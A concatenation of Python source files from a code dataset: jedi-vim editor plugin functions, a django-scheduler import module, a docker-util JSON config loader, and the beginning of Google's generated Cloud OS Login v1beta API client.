# 2. Actually replace the line and redo the status quo.
py_regex = r'%sjedi=([0-9]+), (.*?)%s.*?%sjedi%s'.replace('%s', e)
for i, line in enumerate(vim.current.buffer):
match = re.search(py_regex, line)
if match is not None:
# Some signs were added to minimize syntax changes due to call
# signatures. We have to remove them again. The number of them is
# specified in `match.group(1)`.
after = line[match.end() + int(match.group(1)):]
line = line[:match.start()] + match.group(2) + after
vim.current.buffer[i] = line
vim.current.window.cursor = cursor
@_check_jedi_availability(show_error=False)
@catch_and_print_exceptions
def show_call_signatures(signatures=()):
if vim_eval("has('conceal') && g:jedi#show_call_signatures") == '0':
return
if signatures == ():
signatures = get_script().call_signatures()
clear_call_signatures()
if not signatures:
return
if vim_eval("g:jedi#show_call_signatures") == '2':
return cmdline_call_signatures(signatures)
for i, signature in enumerate(signatures):
line, column = signature.bracket_start
# signatures are listed above each other
line_to_replace = line - i - 1
# because there's a space before the bracket
insert_column = column - 1
if insert_column < 0 or line_to_replace <= 0:
# Edge cases, when the call signature has no space on the screen.
break
# TODO check if completion menu is above or below
line = vim_eval("getline(%s)" % line_to_replace)
params = [p.description.replace('\n', '') for p in signature.params]
try:
# *_*PLACEHOLDER*_* makes something fat. See after/syntax file.
params[signature.index] = '*_*%s*_*' % params[signature.index]
except (IndexError, TypeError):
pass
# This stuff is reaaaaally a hack! I cannot stress enough, that
# this is a stupid solution. But there is really no other yet.
# There is no possibility in VIM to draw on the screen, but there
# will be one (see :help todo Patch to access screen under Python.
# (Marko Mahni, 2010 Jul 18))
text = " (%s) " % ', '.join(params)
text = ' ' * (insert_column - len(line)) + text
end_column = insert_column + len(text) - 2 # -2 due to bold symbols
# Need to decode it with utf8, because vim returns always a python 2
# string even if it is unicode.
e = vim_eval('g:jedi#call_signature_escape')
if hasattr(e, 'decode'):
e = e.decode('UTF-8')
# replace line before with cursor
regex = "xjedi=%sx%sxjedix".replace('x', e)
prefix, replace = line[:insert_column], line[insert_column:end_column]
# Check the replace stuff for strings, to append them
# (don't want to break the syntax)
regex_quotes = r'''\\*["']+'''
# `add` are all the quotation marks.
# join them with a space to avoid producing '''
add = ' '.join(re.findall(regex_quotes, replace))
# search backwards
if add and replace[0] in ['"', "'"]:
a = re.search(regex_quotes + '$', prefix)
add = ('' if a is None else a.group(0)) + add
tup = '%s, %s' % (len(add), replace)
repl = prefix + (regex % (tup, text)) + add + line[end_column:]
vim_eval('setline(%s, %s)' % (line_to_replace, repr(PythonToVimStr(repl))))
@catch_and_print_exceptions
def cmdline_call_signatures(signatures):
def get_params(s):
return [p.description.replace('\n', '') for p in s.params]
if len(signatures) > 1:
params = zip_longest(*map(get_params, signatures), fillvalue='_')
params = ['(' + ', '.join(p) + ')' for p in params]
else:
params = get_params(signatures[0])
text = ', '.join(params).replace('"', '\\"').replace(r'\n', r'\\n')
# Allow 12 characters for ruler/showcmd - setting noruler/noshowcmd
# here causes incorrect undo history
max_msg_len = int(vim_eval('&columns')) - 12
max_num_spaces = (max_msg_len - len(signatures[0].call_name)
- len(text) - 2) # 2 accounts for parentheses
if max_num_spaces < 0:
return # No room for the message
_, column = signatures[0].bracket_start
num_spaces = min(int(vim_eval('g:jedi#first_col +'
'wincol() - col(".")')) +
column - len(signatures[0].call_name),
max_num_spaces)
spaces = ' ' * num_spaces
try:
index = [s.index for s in signatures if isinstance(s.index, int)][0]
escaped_param = params[index].replace(r'\n', r'\\n')
left = text.index(escaped_param)
right = left + len(escaped_param)
vim_command(' echon "%s" | '
'echohl Function | echon "%s" | '
'echohl None | echon "(" | '
'echohl jediFunction | echon "%s" | '
'echohl jediFat | echon "%s" | '
'echohl jediFunction | echon "%s" | '
'echohl None | echon ")"'
% (spaces, signatures[0].call_name, text[:left],
text[left:right], text[right:]))
except (TypeError, IndexError):
vim_command(' echon "%s" | '
'echohl Function | echon "%s" | '
'echohl None | echon "(" | '
'echohl jediFunction | echon "%s" | '
'echohl None | echon ")"'
% (spaces, signatures[0].call_name, text))
@_check_jedi_availability(show_error=True)
@catch_and_print_exceptions
def rename():
if not int(vim.eval('a:0')):
vim_command('augroup jedi_rename')
vim_command('autocmd InsertLeave <buffer> call jedi#rename(1)')
vim_command('augroup END')
vim_command("let s:jedi_replace_orig = expand('<cword>')")
vim_command('normal! diw')
vim_command("let s:jedi_changedtick = b:changedtick")
vim_command('startinsert')
else:
# Remove autocommand.
vim_command('autocmd! jedi_rename InsertLeave')
# Get replacement, if there is something on the cursor.
# This won't be the case when the user ends insert mode right away,
# and `<cword>` would pick up the nearest word instead.
if vim_eval('getline(".")[getpos(".")[2]-1]') != ' ':
replace = vim_eval("expand('<cword>')")
else:
replace = None
cursor = vim.current.window.cursor
# Undo new word, but only if something was changed, which is not the
# case when ending insert mode right away.
if vim_eval('b:changedtick != s:jedi_changedtick') == '1':
vim_command('normal! u') # Undo new word.
vim_command('normal! u') # Undo diw.
vim.current.window.cursor = cursor
if replace:
return do_rename(replace)
def rename_visual():
replace = vim.eval('input("Rename to: ")')
orig = vim.eval('getline(".")[(getpos("\'<")[2]-1):getpos("\'>")[2]]')
do_rename(replace, orig)
def do_rename(replace, orig=None):
if not len(replace):
echo_highlight('No rename possible without name.')
return
if orig is None:
orig = vim_eval('s:jedi_replace_orig')
# Save original window / tab.
saved_tab = int(vim_eval('tabpagenr()'))
saved_win = int(vim_eval('winnr()'))
temp_rename = goto(mode="related_name", no_output=True)
# Sort the whole thing reverse (positions at the end of the line
# must be first, because they move the stuff before the position).
temp_rename = sorted(temp_rename, reverse=True,
key=lambda x: (x.module_path, x.start_pos))
buffers = set()
for r in temp_rename:
if r.in_builtin_module():
continue
if os.path.abspath(vim.current.buffer.name) != r.module_path:
result = new_buffer(r.module_path)
if not result:
echo_highlight("Jedi-vim: failed to create buffer window for {}!".format(r.module_path))
continue
buffers.add(vim.current.buffer.name)
# Save view.
saved_view = vim_eval('string(winsaveview())')
# Replace original word.
vim.current.window.cursor = r.start_pos
vim_command('normal! c{:d}l{}'.format(len(orig), replace))
# Restore view.
vim_command('call winrestview(%s)' % saved_view)
# Restore previous tab and window.
vim_command('tabnext {:d}'.format(saved_tab))
vim_command('{:d}wincmd w'.format(saved_win))
if len(buffers) > 1:
echo_highlight('Jedi did {:d} renames in {:d} buffers!'.format(
len(temp_rename), len(buffers)))
else:
echo_highlight('Jedi did {:d} renames!'.format(len(temp_rename)))
@_check_jedi_availability(show_error=True)
@catch_and_print_exceptions
def py_import():
# args are the same as for the :edit command
args = shsplit(vim.eval('a:args'))
import_path = args.pop()
text = 'import %s' % import_path
scr = jedi.Script(text, 1, len(text), '')
try:
completion = scr.goto_assignments()[0]
except IndexError:
echo_highlight('Cannot find %s in sys.path!' % import_path)
else:
if completion.in_builtin_module():
echo_highlight('%s is a builtin module.' % import_path)
else:
cmd_args = ' '.join([a.replace(' ', '\\ ') for a in args])
new_buffer(completion.module_path, cmd_args)
@catch_and_print_exceptions
def py_import_completions():
argl = vim.eval('a:argl')
try:
import jedi
except ImportError:
print('Pyimport completion requires jedi module: https://github.com/davidhalter/jedi')
comps = []
else:
text = 'import %s' % argl
script = jedi.Script(text, 1, len(text), '')
comps = ['%s%s' % (argl, c.complete) for c in script.completions()]
vim.command("return '%s'" % '\n'.join(comps))
@catch_and_print_exceptions
def new_buffer(path, options=''):
# options are what you can to edit the edit options
if vim_eval('g:jedi#use_tabs_not_buffers') == '1':
_tabnew(path, options)
elif not vim_eval('g:jedi#use_splits_not_buffers') == '1':
user_split_option = vim_eval('g:jedi#use_splits_not_buffers')
split_options = {
'top': 'topleft split',
'left': 'topleft vsplit',
'right': 'botright vsplit',
'bottom': 'botright split',
'winwidth': 'vs'
}
if user_split_option == 'winwidth' and vim.current.window.width <= 2 * int(vim_eval("&textwidth ? &textwidth : 80")):
split_options['winwidth'] = 'sp'
if user_split_option not in split_options:
print('g:jedi#use_splits_not_buffers value is not correct, valid options are: %s' % ','.join(split_options.keys()))
else:
vim_command(split_options[user_split_option] + " %s" % path)
else:
if vim_eval("!&hidden && &modified") == '1':
if vim_eval("bufname('%')") is None:
echo_highlight('Cannot open a new buffer, use `:set hidden` or save your buffer')
return False
else:
vim_command('w')
vim_command('edit %s %s' % (options, escape_file_path(path)))
# sometimes syntax is being disabled and the filetype not set.
if vim_eval('!exists("g:syntax_on")') == '1':
vim_command('syntax enable')
if vim_eval("&filetype != 'python'") == '1':
vim_command('set filetype=python')
return True
@catch_and_print_exceptions
def _tabnew(path, options=''):
"""
Open a file in a new tab or switch to an existing one.
:param options: `:tabnew` options, read vim help.
"""
path = os.path.abspath(path)
if vim_eval('has("gui")') == '1':
vim_command('tab drop %s %s' % (options, escape_file_path(path)))
return
for tab_nr in range(int(vim_eval("tabpagenr('$')"))):
for buf_nr in vim_eval("tabpagebuflist(%i + 1)" % tab_nr):
buf_nr = int(buf_nr) - 1
try:
buf_path = vim.buffers[buf_nr].name
except (LookupError, ValueError):
# Just do good old asking for forgiveness.
# don't know why this happens :-)
pass
else:
if buf_path == path:
# tab exists, just switch to that tab
vim_command('tabfirst | tabnext %i' % (tab_nr + 1))
# Goto the buffer's window.
vim_command('exec bufwinnr(%i) . " wincmd w"' % (buf_nr + 1))
break
else:
continue
break
else:
# tab doesn't exist, add a new one.
vim_command('tabnew %s' % escape_file_path(path))
def escape_file_path(path):
return path.replace(' ', r'\ ')
def print_to_stdout(level, str_out):
print(str_out)
|
GrahamDigital/django-scheduler
|
refs/heads/gd/master
|
schedule/models/__init__.py
|
10
|
from schedule.models.calendars import Calendar, CalendarRelation
from schedule.models.events import *
from schedule.models.rules import *
from schedule.signals import *
|
peitur/docker-util
|
refs/heads/master
|
lib/Controller/config.py
|
1
|
import sys,os, json, re
from pprint import pprint
import util
## make it into a singleton, only want one single store for all instanciations of config
class SingInstance( object ):
__shared = {}
def __init__( self ):
self.__dict__ = self.__shared
class ConfigContent( SingInstance ):
def __init__(self, filename = None, **options ):
super( ConfigContent, self ).__init__()
self.__debug = False
if 'debug' in options and options['debug'] in (True, False):
self.__debug = options['debug']
if filename:
self.__filename = filename
#######################
## variable management in config files.
def __variable_apply( self ):
var_rx = re.compile( r"<\|\s*(.+)\s*\|>" )
varlist = {}
## first go through all key in config to add all string based basic variables.
## Variables depending on variables are still stricky though due to order of key loading.
## Should have made config into list to make sure it's all good at all times..
for item in self.__config:
if util.is_string( self.__config[ item ] ):
if not var_rx.match( self.__config[ item ] ):
varlist[ item ] = self.__config[ item ]
for item in self.__config:
if util.is_string( self.__config[ item ] ):
m = var_rx.match( self.__config[ item ] )
if m:
for v in m.groups( ):
vstr = r"<\|%s\|>" % ( v )
self.__config[ item ] = re.sub( vstr, varlist[ v ], self.__config[ item ] )
varlist[ item ] = self.__config[ item ]
#######################
def load_data( self, filename = None ):
if not filename:
filename = self.__filename
data = []
if self.__debug: print("DEBUG: Reading file %(fn)s" % {'fn': filename } )
try:
for line in open( filename, "r"):
data.append( line.rstrip().lstrip() )
except Exception as error:
print("ERROR: Loading config file %s failed : %s" % ( filename, error ) )
if self.__debug: print("DEBUG: Read %(ln)s lines from %(fn)s" % {'ln': len( data ), 'fn': filename } )
if self.__debug:
pprint( data )
self.__config = json.loads( "\n".join( data ) )
self.__variable_apply()
return len( self.__config.keys() )
def env( self, key ):
try:
return os.environ[ key ]
except:
return None
def filename( self ):
return self.__filename
def get( self, key, default = None ):
if key in self.__config:
return self.__config[ key ]
return default
def __hash__( self ):
return {
'filename': self.__filename,
'config': self.__config
}
if __name__ == "__main__":
s1 = ConfigContent( "../../test/samples/config.json" )
s1.load_data()
pprint( s1.__hash__() )
# s2 = ConfigContent()
# s3 = ConfigContent()
# s4 = ConfigContent()
# pprint( s1.filename() )
# pprint( s2.filename() )
# pprint( s3.filename() )
# pprint( s4.filename() )
# pprint( s1.__hash__() )
|
googleapis/googleapis-gen
|
refs/heads/master
|
google/cloud/oslogin/v1beta/oslogin-v1beta-py/google/cloud/oslogin_v1beta/services/os_login_service/client.py
|
1
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.oslogin.common import common_pb2 # type: ignore
from google.cloud.oslogin_v1beta.types import oslogin
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import OsLoginServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import OsLoginServiceGrpcTransport
from .transports.grpc_asyncio import OsLoginServiceGrpcAsyncIOTransport
class OsLoginServiceClientMeta(type):
"""Metaclass for the OsLoginService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[OsLoginServiceTransport]]
_transport_registry["grpc"] = OsLoginServiceGrpcTransport
_transport_registry["grpc_asyncio"] = OsLoginServiceGrpcAsyncIOTransport
def get_transport_class(cls,
label: str = None,
) -> Type[OsLoginServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class OsLoginServiceClient(metaclass=OsLoginServiceClientMeta):
"""Cloud OS Login API
The Cloud OS Login API allows you to manage users and their
associated SSH public keys for logging into virtual machines on
Google Cloud Platform.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "oslogin.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
OsLoginServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
OsLoginServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> OsLoginServiceTransport:
"""Returns the transport used by the client instance.
Returns:
OsLoginServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def posix_account_path(user: str,project: str,) -> str:
"""Returns a fully-qualified posix_account string."""
return "users/{user}/projects/{project}".format(user=user, project=project, )
@staticmethod
def parse_posix_account_path(path: str) -> Dict[str,str]:
"""Parses a posix_account path into its component segments."""
m = re.match(r"^users/(?P<user>.+?)/projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def ssh_public_key_path(user: str,fingerprint: str,) -> str:
"""Returns a fully-qualified ssh_public_key string."""
return "users/{user}/sshPublicKeys/{fingerprint}".format(user=user, fingerprint=fingerprint, )
@staticmethod
def parse_ssh_public_key_path(path: str) -> Dict[str,str]:
"""Parses a ssh_public_key path into its component segments."""
m = re.match(r"^users/(?P<user>.+?)/sshPublicKeys/(?P<fingerprint>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def user_path(user: str,) -> str:
"""Returns a fully-qualified user string."""
return "users/{user}".format(user=user, )
@staticmethod
def parse_user_path(path: str) -> Dict[str,str]:
"""Parses a user path into its component segments."""
m = re.match(r"^users/(?P<user>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, OsLoginServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the os login service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, OsLoginServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, OsLoginServiceTransport):
# transport is a OsLoginServiceTransport instance.
if credentials or client_options.credentials_file:
raise ValueError("When providing a transport instance, "
"provide its credentials directly.")
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
)
def delete_posix_account(self,
request: oslogin.DeletePosixAccountRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a POSIX account.
Args:
request (google.cloud.oslogin_v1beta.types.DeletePosixAccountRequest):
The request object. A request message for deleting a
POSIX account entry.
name (str):
Required. A reference to the POSIX account to update.
POSIX accounts are identified by the project ID they are
associated with. A reference to the POSIX account is in
format ``users/{user}/projects/{project}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.DeletePosixAccountRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.DeletePosixAccountRequest):
request = oslogin.DeletePosixAccountRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_posix_account]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
def delete_ssh_public_key(self,
request: oslogin.DeleteSshPublicKeyRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes an SSH public key.
Args:
request (google.cloud.oslogin_v1beta.types.DeleteSshPublicKeyRequest):
The request object. A request message for deleting an
SSH public key.
name (str):
Required. The fingerprint of the public key to update.
Public keys are identified by their SHA-256 fingerprint.
The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.DeleteSshPublicKeyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.DeleteSshPublicKeyRequest):
request = oslogin.DeleteSshPublicKeyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_ssh_public_key]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
def get_login_profile(self,
request: oslogin.GetLoginProfileRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> oslogin.LoginProfile:
r"""Retrieves the profile information used for logging in
to a virtual machine on Google Compute Engine.
Args:
request (google.cloud.oslogin_v1beta.types.GetLoginProfileRequest):
The request object. A request message for retrieving the
login profile information for a user.
name (str):
Required. The unique ID for the user in format
``users/{user}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.oslogin_v1beta.types.LoginProfile:
The user profile information used for
logging in to a virtual machine on
Google Compute Engine.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.GetLoginProfileRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.GetLoginProfileRequest):
request = oslogin.GetLoginProfileRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_login_profile]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_ssh_public_key(self,
request: oslogin.GetSshPublicKeyRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> common_pb2.SshPublicKey:
r"""Retrieves an SSH public key.
Args:
request (google.cloud.oslogin_v1beta.types.GetSshPublicKeyRequest):
The request object. A request message for retrieving an
SSH public key.
name (str):
Required. The fingerprint of the public key to retrieve.
Public keys are identified by their SHA-256 fingerprint.
The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.oslogin.common.common_pb2.SshPublicKey:
The SSH public key information
associated with a Google account.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.GetSshPublicKeyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.GetSshPublicKeyRequest):
request = oslogin.GetSshPublicKeyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_ssh_public_key]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def import_ssh_public_key(self,
request: oslogin.ImportSshPublicKeyRequest = None,
*,
parent: str = None,
ssh_public_key: common_pb2.SshPublicKey = None,
project_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
